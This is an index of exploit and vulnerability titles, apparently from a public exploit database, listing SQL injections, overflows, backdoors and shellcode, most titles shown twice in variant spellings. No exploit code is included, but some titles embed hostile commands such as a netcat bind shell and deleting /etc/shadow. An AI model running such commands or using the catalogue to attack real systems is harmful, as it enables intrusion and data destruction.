'conf.inc'Remote Config File Disclosure phpGreetCards - 'conf.inc'Config File Disclosure phpAdBoard - 'conf.inc' Remote Config File Disclosure 
phpGreetCards - 'conf.inc' Config File Disclosure phpAdBoardPro - 'config.inc'Config File Disclosure phpDatingClub - 'conf.inc'File Disclosure Job2C - 'conf.inc'Config File Disclosure phpAdBoardPro - 'config.inc' Config File Disclosure phpDatingClub - 'conf.inc' File Disclosure Job2C - 'conf.inc' Config File Disclosure Star Downloader Free 1.45 - '.dat'Universal SEH Overwrite Star Downloader Free 1.45 - '.dat' Universal SEH Overwrite Destiny Media Player 1.61 - '.rdl'Local Buffer Overflow Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow Thickbox Gallery 2 - 'index.php ln'Local File Inclusion Thickbox Gallery 2 - 'index.php ln' Local File Inclusion Symantec Fax Viewer Control 10 - 'DCCFAXVW.DLL'Remote Buffer Overflow Exploit Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow Exploit Mercury Audio Player 1.21 - '.b4s'Local Stack Overflow Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow RM Downloader - '.smi'Local Stack Overflow RM Downloader - '.smi' Local Stack Overflow RM Downloader - '.smi'Universal Local Buffer Overflow RM Downloader - '.smi' Universal Local Buffer Overflow RM Downloader 3.0.0.9 - '.RAM'Local Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM'Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF'Local Buffer Overflow Exploit Mini-stream Ripper 3.0.1.1 - '.RAM'Local Buffer Overflow RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow Exploit Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM'Local Buffer Overflow Exploit Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow Exploit MPLAB IDE 8.30 - '.mcp'Universal Seh Overwrite MPLAB IDE 8.30 - '.mcp' Universal Seh Overwrite Pinnacle Studio 12 - '.hfz'Directory Traversal Pinnacle Studio 12 - '.hfz' Directory Traversal COWON 
America jetCast 2.0.4.1109 - '.mp3'Local Overflow COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow R2 Newsletter Lite/Pro/Stats - 'admin.mdb'Database Disclosure R2 Newsletter Lite/Pro/Stats - 'admin.mdb' Database Disclosure phpDatingClub 3.7 - SQL / Cross-Site Scripting Injection phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection ClearContent - 'image.php url'Remote File Inclusion / Local File Inclusion ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion DJ Calendar - 'DJcalendar.cgi TEMPLATE'File Disclosure DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure Icarus 2.0 - '.ICP'Local Stack Overflow Exploit Icarus 2.0 - '.ICP' Local Stack Overflow Exploit MixSense 1.0.0.1 DJ Studio - '.mp3'Crash Exploit MixSense 1.0.0.1 DJ Studio - '.mp3' Crash Exploit htmldoc 1.8.27.1 - '.html'Universal Stack Overflow htmldoc 1.8.27.1 - '.html' Universal Stack Overflow Acoustica MP3 Audio Mixer 2.471 - '.sgp'Crash Exploit Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash Exploit PHP Paid 4 Mail Script - 'paidbanner.php ID'SQL Injection PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection Microsoft Windows XP - 'win32k.sys'Privilege Escalation Microsoft Windows XP - 'win32k.sys' Privilege Escalation Portel 2008 - 'decide.php patron'Blind SQL Injection Portel 2008 - 'decide.php patron' Blind SQL Injection Microsoft Windows 2003 - '.EOT'BSOD Crash Exploit Microsoft Windows 2003 - '.EOT' BSOD Crash Exploit THOMSON ST585 - 'user.ini'Arbitrary Download THOMSON ST585 - 'user.ini' Arbitrary Download PHP Email Manager - 'remove.php ID'SQL Injection PHP Email Manager - 'remove.php ID' SQL Injection WAR-FTPD 1.65 - (MKD/CD Requests) Denial of Service War-FTPD 1.65 - (MKD/CD Requests) Denial of Service EMO Breader Manager - 'video.php movie'SQL Injection EMO Breader Manager - 'video.php movie' SQL Injection Invisible Browsing 5.0.52 - '.ibkey'Local Buffer Overflow Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow HotWeb Rentals - 
'details.asp PropId'Blind SQL Injection HotWeb Rentals - 'details.asp PropId' Blind SQL Injection Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend'Command Injection Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection Blender 2.49b - '.blend'Remote Command Execution Blender 2.49b - '.blend' Remote Command Execution Aiocp 1.4.001 - File Inclusion AIOCP 1.4.001 - File Inclusion BibTeX - '.bib'File Handling Memory Corruption BibTeX - '.bib' File Handling Memory Corruption PHP 5.0.0 - domxml_open_file() Local Denial of Service PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service PHP 5.0.0 - simplexml_load_file() Local Denial of Service PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows Audacity 1.2.6 - '.gro'Buffer Overflow Audacity 1.2.6 - '.gro' Buffer Overflow gAlan - '.galan'Universal Buffer Overflow gAlan - '.galan' Universal Buffer Overflow ASPGuest - 'edit.asp ID'Blind SQL Injection Smart ASPad - 'campaignEdit.asp CCam'Blind SQL Injection ASPGuest - 'edit.asp ID' Blind SQL Injection Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection dblog - 'dblog.mdb'Remote Database Disclosure dblog - 'dblog.mdb' Remote Database Disclosure PHP 5.0.0 - xmldocfile() Local Denial of Service PHP 5.0.0 - 'xmldocfile()' Local Denial of Service Apollo Player 37.0.0.0 - '.aap'Buffer Overflow Denial of Service Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service OpenOffice - '.slk'Parsing Null Pointer OpenOffice - '.slk' Parsing Null Pointer crownweb - 'page.cfm'SQL Injection crownweb - 'page.cfm' SQL Injection OtsTurntables Free 1.00.047 - '.olf'Universal Buffer Overflow OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow Windows Media Player 11.0.5721.5145 - '.mpg'Buffer Overflow Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow Orbital Viewer 1.04 - '.orb'Local Universal 
SEH Overflow Orbital Viewer 1.04 - '.orb' Local Universal SEH Overflow iPhone / iTouch FTPDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service JAD java decompiler 1.5.8g - '.class'Stack Overflow Denial of Service JAD java decompiler 1.5.8g - '.class' Stack Overflow Denial of Service Media Player 6.4.9.1 with K-Lite Codec Pack - Denial of Service/Crash '.avi' Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' Denial of Service/Crash no$gba 2.5c - '.nds'Local crash no$gba 2.5c - '.nds' Local crash Xilisoft Blackberry Ring Tone Maker - '.wma'Local Crash Xilisoft Blackberry Ring Tone Maker - '.wma' Local Crash Dualis 20.4 - '.bin'Local Daniel Of Service Dualis 20.4 - '.bin' Local Daniel Of Service DSEmu 0.4.10 - '.nds'Local Crash Exploit DSEmu 0.4.10 - '.nds' Local Crash Exploit MP3 Wav Editor 3.80 - '.mp3'Local Denial of Service MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service FontForge - .BDF Font File Stack-Based Buffer Overflow FontForge - .BDF Font File Stack Based Buffer Overflow Dolphin 2.0 - '.elf'Local Daniel Of Service Dolphin 2.0 - '.elf' Local Daniel Of Service e-webtech - 'new.asp?id='SQL Injection e-webtech - 'new.asp?id=' SQL Injection SmallFTPD FTP Server 1.0.3 - DELE Command Denial of Service SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service RahnemaCo - page.php PageID Remote File Inclusion RahnemaCo - 'page.php' PageID Remote File Inclusion goffgrafix - Design's SQL Injection goffgrafix - Design's - SQL Injection Spaceacre - SQL / Cross-Site Scripting / HTML Injection Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection ZipExplorer 7.0 - '.zar'Denial of Service ZipExplorer 7.0 - '.zar' Denial of Service ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation iOS - Version-independent shellcode iOS - Version-independent Shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Windows 5.0 < 
7.0 x86 - Null Free bindshell port 28876 Shellcode Win32 - SEH omelet shellcode Win32 - SEH omelet Shellcode Win32 - Connectback_ receive_ save and execute shellcode Win32 - Connectback_ receive_ save and execute Shellcode Windows XP - download and exec source shellcode Windows XP - download and exec source Shellcode Win32 XP SP3 - ShellExecuteA shellcode Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) shellcode Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 shellcode Win32 XP SP3 - ShellExecuteA Shellcode Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) Shellcode Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode Win32 - JITed stage-0 shellcode Win32 - JITed stage-0 Shellcode Windows - JITed egg-hunter stage-0 shellcode Windows - JITed egg-hunter stage-0 Shellcode Linux/x86 - nc -lvve/bin/sh -p13377 shellcode Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode Corel VideoStudio Pro X3 - '.mp4'Buffer Overflow Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow Boat Classifieds - 'printdetail.asp?Id'SQL Injection Boat Classifieds - 'printdetail.asp?Id' SQL Injection PHPBB MOD 2.0.19 - Invitation Only (PassCode Bypass) phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass) SnoGrafx - 'cat.php?cat'SQL Injection SnoGrafx - 'cat.php?cat' SQL Injection Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Mediacoder 0.7.5.4710 - ' Universal' SEH Buffer Overflow PlayPad Music Player 1.12 - '.mp3'Denial of Service PlayPad Music Player 1.12 - '.mp3' Denial of Service Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscal'l Emulation Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation xt:Commerce Gambio 2008 - 2010 - ERROR Based SQL Injection 'reviews.php' xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection CuteNews - 'index.php?page'Local File Inclusion CuteNews - 'index.php?page' Local File Inclusion Hanso Converter 1.4.0 - '.ogg'Denial of 
Service Hanso Converter 1.4.0 - '.ogg' Denial of Service ARM - Bindshell port 0x1337 shellcode ARM - Bind Connect UDP Port 68 shellcode ARM - Loader Port 0x1337 shellcode ARM - ifconfig eth0 and Assign Address 192.168.0.2 shellcode ARM - Bindshell port 0x1337 Shellcode ARM - Bind Connect UDP Port 68 Shellcode ARM - Loader Port 0x1337 Shellcode ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode SmallFTPD 1.0.3 - Remote Directory Traversal SmallFTPd 1.0.3 - Remote Directory Traversal HtaEdit 3.2.3.0 - '.hta'Buffer Overflow HtaEdit 3.2.3.0 - '.hta' Buffer Overflow ProFTPD IAC 1.3.x - Remote Root Exploit ProFTPd IAC 1.3.x - Remote Root Exploit VbsEdit 4.7.2.0 - '.vbs'Buffer Overflow Power Audio Editor 7.4.3.230 - '.cda'Denial of Service VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow Power Audio Editor 7.4.3.230 - '.cda' Denial of Service Sitefinity CMS - 'ASP.NET'Arbitrary File Upload Sitefinity CMS - 'ASP.NET' Arbitrary File Upload Native Instruments Traktor Pro 1.2.6 - Stack-based Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow ProFTPD 1.3.3c - Compromised Source Remote Root Trojan ProFTPd 1.3.3c - Compromised Source Remote Root Trojan Dejcom Market CMS - 'showbrand.aspx'SQL Injection Dejcom Market CMS - 'showbrand.aspx' SQL Injection Aesop GIF Creator 2.1 - '.aep'Buffer Overflow Aesop GIF Creator 2.1 - '.aep' Buffer Overflow Apple iPhone Safari - 'JS .'Remote Crash Apple iPhone Safari - 'JS .' 
Remote Crash Microsoft Windows Fax Services Cover Page Editor - '.cov'Memory Corruption Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption Win32 - speaking shellcode Win32 - speaking Shellcode ProFTPD mod_sftp - Integer Overflow Denial of Service (PoC) ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC) BWMeter 5.4.0 - '.csv'Denial of Service BWMeter 5.4.0 - '.csv' Denial of Service Magic Music Editor - '.cda'Denial of Service Magic Music Editor - '.cda' Denial of Service wu-ftpd - SITE EXEC/INDEX Format String WU-FTPD - SITE EXEC/INDEX Format String Samba - trans2open Overflow (Solaris SPARC) Samba (Solaris SPARC) - trans2open Overflow FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow Microsoft IIS 4.0 - '.htr'Path Overflow Microsoft IIS 4.0 - '.htr' Path Overflow VariCAD 2010-2.05 EN - '.DWB'Stack Buffer Overflow VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow AOL 9.5 - Phobos.Playlist Import() Stack-based Buffer Overflow AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow ProFTPD 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow ProFTPD 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow ProFTPD 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow PHPBB - viewtopic.php Arbitrary Code Execution phpBB - viewtopic.php Arbitrary Code Execution ProFTPD-1.3.3c - Backdoor Command Execution ProFTPd-1.3.3c - Backdoor Command Execution ABBS Electronic Flash Cards 2.1 - '.fcd'Buffer Overflow ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow VeryTools Video Spirit Pro 1.70 - '.visprj'Buffer Overflow VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow Wordtrainer 3.0 - '.ord'Buffer Overflow Wordtrainer 3.0 - '.ord' Buffer Overflow PlaylistMaker 1.5 - 
'.txt'Buffer Overflow PlaylistMaker 1.5 - '.txt' Buffer Overflow libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow (PoC) libmodplug 0.8.8.2 - (.abc) Stack Based Buffer Overflow (PoC) MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m'Stack Buffer Overflow MJM Core Player 2011 - '.s3m'Stack Buffer Overflow MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow MJM Core Player 2011 - '.s3m' Stack Buffer Overflow Magix Musik Maker 16 - '.mmm'Stack Buffer Overflow Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow Smallftpd 1.0.3 FTP Server - Denial of Service SmallFTPd 1.0.3 FTP Server - Denial of Service FreeAmp 2.0.7 - '.fat'Buffer Overflow FreeAmp 2.0.7 - '.fat' Buffer Overflow VSFTPD 2.3.4 - Backdoor Command Execution vsftpd 2.3.4 - Backdoor Command Execution OS-X - Universal ROP shellcode OS-X - Universal ROP Shellcode Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow Citrix XenApp / XenDesktop - Stack Based Buffer Overflow World Of Warcraft - 'chat-cache.txt'Local Stack Overflow Denial of Service World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service Wav Player 1.1.3.6 - '.pll'Buffer Overflow Wav Player 1.1.3.6 - '.pll' Buffer Overflow Norman Security Suite 8 - 'nprosec.sys'Privilege Escalation Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation Ashampoo Burning Studio Elements 10.0.9 - '.ashprj'Heap Overflow Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow Cytel Studio 9.0 - '.CY3'Stack Buffer Overflow Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow Xion Audio Player 1.0.127 - '.aiff'Denial of Service Xion Audio Player 1.0.127 - '.aiff' Denial of Service SnackAmp 3.1.3 - '.aiff'Denial of Service SnackAmp 3.1.3 - '.aiff' Denial of Service PHP Ticket System Beta 1 - 'index.php p parameter'SQL Injection PHP Ticket System Beta 1 - 'index.php p parameter' SQL Injection Nokia PC Suite Video Manager 7.1.180.64 - '.mp4'Denial of Service Nokia PC Suite Video Manager 7.1.180.64 - 
'.mp4' Denial of Service Multimedia Builder 4.9.8 - '.mef'Denial of Service Multimedia Builder 4.9.8 - '.mef' Denial of Service Tftpd32 DNS Server 4.00 - Denial of Service LibreOffice 3.5.3 - '.rtf'FileOpen Crash TFTPD32 DNS Server 4.00 - Denial of Service LibreOffice 3.5.3 - '.rtf' FileOpen Crash Microsoft Wordpad 5.1 - '.doc'Null Pointer Dereference Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference Lattice Semiconductor PAC-Designer 6.21 - '.PAC'Exploit Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (1) wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (2) WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (1) WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (2) ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) ProFTPD 1.2 pre6 - snprintf ProFTPd 1.2 pre6 - snprintf Washington University wu-ftpd 2.5.0 - message Buffer Overflow Washington University WU-FTPD 2.5.0 - message Buffer Overflow GlFtpd 1.17.2 - Exploit glFTPd 1.17.2 - Exploit Oracle Outside-In - .LWP File Parsing Stack-Based Buffer Overflow Oracle Outside-In - .LWP File Parsing Stack Based Buffer Overflow wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1) wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2) wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3) Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw'Cross-Site Scripting Microsoft Indexing Services for 
Windows 2000/NT 4.0 - '.htw' Cross-Site Scripting Microsoft Windows Media Player 7.0 - '.wms'Arbitrary Script Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit ProFTPD 1.2 - SIZE Remote Denial of Service ProFTPd 1.2 - SIZE Remote Denial of Service Microsoft Windows Media Player 7.0 - '.wmz'Arbitrary Java Applet Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion WU-FTPD 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String Joe Text Editor 2.8 - '.joerc'Arbitrary Command Execution Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal WhitSoft slimserve ftpd 1.0/2.0 - Directory Traversal wu-ftpd 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPD 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion freebsd 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities raidenftpd 2.1 - Directory Traversal RaidenFTPd 2.1 - Directory Traversal AV Arcade Free Edition - 'add_rating.php id parameter'Blind SQL Injection AV Arcade Free Edition - 'add_rating.php id parameter' Blind SQL Injection Solaris 2.6/7/8 - SPARC xlock Heap Overflow Solaris 2.6/7/8 -(SPARC) xlock Heap Overflow glFTPD 1.x - LIST Denial of Service glFTPd 1.x - 'LIST' Denial of Service Wu-Ftpd 2.6 - File Globbing Heap Corruption WU-FTPD 2.6 - File Globbing Heap Corruption Joomla RokModule Component - 'index.php module parameter'Blind SQL Injection Joomla RokModule Component - 'index.php module parameter' Blind SQL Injection PHPWebsite 0.8.2 - PHP File Include phpWebSite 0.8.2 - PHP File Include PHPWebSite 0.8.3 
- News Message HTML Injection phpWebSite 0.8.3 - News Message HTML Injection PHPWebSite 0.8.3 - article.php Cross-Site Scripting phpWebSite 0.8.3 - article.php Cross-Site Scripting PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion PHPBB 2.0.3 - search.php Cross-Site Scripting phpBB 2.0.3 - search.php Cross-Site Scripting ProFTPD 1.2.x - STAT Command Denial of Service ProFTPd 1.2.x - STAT Command Denial of Service Joomla Tags - 'index.php tag parameter'SQL Injection Joomla Tags - 'index.php tag parameter' SQL Injection Joomla Commedia Plugin - 'index.php task parameter'SQL Injection Joomla Kunena Component - 'index.php search parameter'SQL Injection Joomla Commedia Plugin - 'index.php task parameter' SQL Injection Joomla Kunena Component - 'index.php search parameter' SQL Injection PHPBB 2.0.3 - privmsg.php SQL Injection phpBB 2.0.3 - privmsg.php SQL Injection Joomla Spider Catalog - 'index.php product_id parameter'SQL Injection Joomla Spider Catalog - 'index.php product_id parameter' SQL Injection Battleaxe Software BTTLXE Forum - login.asp SQL Injection Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection SudBox Boutique 1.2 - login.php Authentication Bypass SudBox Boutique 1.2 - 'login.php' Authentication Bypass friendsinwar FAQ Manager - 'view_faq.php question parameter'SQL Injection friendsinwar FAQ Manager - 'view_faq.php question parameter' SQL Injection GuildFTPD 0.999.8 - CWD Command Denial of Service GuildFTPd 0.999.8 - CWD Command Denial of Service ProductCart 1.5/1.6/2.0 - login.asp SQL Injection ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection SmartCMS - 'index.php idx parameter'SQL Injection SmartCMS - 'index.php idx parameter' SQL Injection mcrypt 2.6.8 - stack-based Buffer Overflow (PoC) mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC) wu-ftpd 2.6.2 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.2 - realpath() Off-by-One Buffer Overflow wu-ftpd 2.6.2 / 2.6.0 
/ 2.6.1 - realpath() Off-by-One Buffer Overflow freeBSD 4.8 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-by-One Buffer Overflow FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow SmartCMS - 'index.php menuitem parameter'SQL Injection / Cross-Site Scripting SmartCMS - 'index.php menuitem parameter' SQL Injection / Cross-Site Scripting FreeFTPD - Remote Authentication Bypass Exploit freeFTPd - Remote Authentication Bypass Exploit PHPBB 2.0.6 - URL BBCode HTML Injection phpBB 2.0.6 - URL BBCode HTML Injection wzdftpd 0.1 rc5 - Login Remote Denial of Service ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun WzdFTPD 0.1 rc5 - Login Remote Denial of Service ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun PHPBB 2.0.x - profile.php SQL Injection phpBB 2.0.x - profile.php SQL Injection PHPBB 2.0.6 - privmsg.php Cross-Site Scripting phpBB 2.0.6 - privmsg.php Cross-Site Scripting Sony PC Companion 2.1 - (DownloadURLToFile()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (Load()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (CheckCompatibility()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow SelectSurvey CMS - 'ASP.NET'Arbitrary File Upload Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload MyBB AwayList Plugin - 'index.php id parameter'SQL Injection MyBB AwayList Plugin - 'index.php id parameter' SQL Injection SmallFTPD 1.0.3 - Remote Denial of Service SmallFTPd 1.0.3 - Remote Denial of Service MyBB - 'editpost.php posthash'SQL Injection Joomla Spider Calendar - 'index.php date parameter'Blind SQL 
Injection MyBB - 'editpost.php posthash' SQL Injection Joomla Spider Calendar - 'index.php date parameter' Blind SQL Injection Phorum 3.x - login.php HTTP_REFERER Cross-Site Scripting Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting PHPBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection phpBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'Exploit Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit PHPBB 2.0.x - album_portal.php Remote File Inclusion phpBB 2.0.x - album_portal.php Remote File Inclusion PHPBB 2.0.x - viewtopic.php PHP Script Injection phpBB 2.0.x - viewtopic.php PHP Script Injection JShop E-Commerce Suite 3.0 - page.php Cross-Site Scripting JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting NullSoft Winamp 2-5 - '.wsz'Remote Code Execution NullSoft Winamp 2-5 - '.wsz' Remote Code Execution phpWebsite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting Scripts Genie Gallery Personals - 'gallery.php L parameter'SQL Injection Scripts Genie Gallery Personals - 'gallery.php L parameter' SQL Injection Scripts Genie Domain Trader - 'catalog.php id parameter'SQL Injection Scripts Genie Domain Trader - 'catalog.php id parameter' SQL Injection Scripts Genie Games Site Script - 'index.php id parameter'SQL Injection Scripts Genie Games Site Script - 'index.php id parameter' SQL Injection Photodex ProShow Producer 5.0.3297 - '.pxs'Memory Corruption Exploit Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption Exploit Scripts Genie Top Sites - 'out.php id parameter'SQL Injection Scripts Genie Top Sites - 'out.php id parameter' SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter'SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter' SQL Injection W-Agora 4.1.6 - a login.php loginuser Parameter Cross-Site Scripting W-Agora 4.1.6 - a 
'login.php' loginuser Parameter Cross-Site Scripting PHPWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack-Based Buffer Overflow Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow PHPBB 2.0.x - admin_cash.php Remote PHP File Include phpBB 2.0.x - admin_cash.php Remote PHP File Include UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter Cross-Site Scripting UBBCentral UBB.threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php URL Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php Username Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php Newlanguage Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' Username Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting Rebus:list - 'list.php list_id parameter'SQL Injection Rebus:list - 'list.php list_id parameter' SQL Injection SynConnect Pms - 'index.php loginid parameter'SQL Injection SynConnect Pms - 'index.php loginid parameter' SQL Injection Groovy Media Player 3.2.0 - '.mp3'Buffer Overflow Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow glFTPD 1.x/2.0 ZIP Plugins - Multiple Directory Traversal Vulnerabilities glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities PHPWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload PHPBB 2.0.x - Authentication Bypass (1) 